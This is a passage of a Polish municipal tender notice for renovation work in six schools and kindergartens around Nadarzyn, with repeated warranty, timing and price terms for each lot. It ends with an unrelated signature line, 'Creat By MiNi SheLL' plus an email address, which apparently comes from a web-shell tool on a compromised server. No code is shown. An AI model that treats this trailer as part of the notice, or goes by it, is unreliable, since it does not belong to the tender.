2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną                              i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24-miesięcznej gwarancji jakości i rękojmi za wady licząc od daty podpisania protokolarnego bezusterkowego odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót (Zadanie nr 1 - 6),
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. 
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ                   W KOSTOWCU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są:
Zadanie 2. 
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ                   W KOSTOWCU obejmujące:
- wymiana drzwi do sal,
- montaż czujek gazu,
- roboty konserwacyjne na obiekcie Orlika,
2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną    i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24-miesięcznej gwarancji jakości i rękojmi za wady licząc od daty podpisania protokolarnego bezusterkowego odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót (Zadanie nr 1 - 6),
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU GIMNAZJUM W NADARZYNIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są:

Zadanie nr 3. 
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU GIMNAZJUM W NADARZYNIE obejmujące:
- malowanie szatni,
- malowanie wnęk na korytarzach,
- malowanie korytarza dolnego 

2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną                              i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24-miesięcznej gwarancji jakości i rękojmi za wady licząc od daty podpisania protokolarnego bezusterkowego odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót (Zadanie nr 1 - 6),
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W MŁOCHOWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są:
Zadanie nr 4.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA         W MŁOCHOWIE obejmujące:
- malowanie kuchni i bloku żywieniowego,
- malowanie bramy i ogrodzenia wzdłuż ul. Źródlanej
- malowanie grzejników ,
- malowanie drzwi wewnętrznych.
2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną    i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24-miesięcznej gwarancji jakości i rękojmi za wady licząc od daty podpisania protokolarnego bezusterkowego odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót (Zadanie nr 1 - 6),
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W NADARZYNIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są:
Zadanie nr 5.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA                                            W NADARZYNIE obejmujące:
- cyklinowanie parkietu w salach dydaktycznych - I piętro,
- remont osłon grzejnikowych (sala 1, 2, 3, 4, 5),
- demontaż drzwi pomiędzy salami III i IV,
- wymiana starych drzwi do schowków,
- malowanie sal: sala I, II, III, IV, V,
- malowanie zaplecza kuchni,
2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną                              i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24-miesięcznej gwarancji jakości i rękojmi za wady licząc od daty podpisania protokolarnego bezusterkowego odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót (Zadanie nr 1 - 6),
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W WOLICY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są:
Zadanie nr 6.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W WOLICY obejmujące:
- malowanie szatni, 
- malowanie sali gimnastycznej,
- cyklinowanie parkietu sali gimnastycznej
2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną    i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24-miesięcznej gwarancji jakości i rękojmi za wady licząc od daty podpisania protokolarnego bezusterkowego odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót (Zadanie nr 1 - 6),
3)	wzorze umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com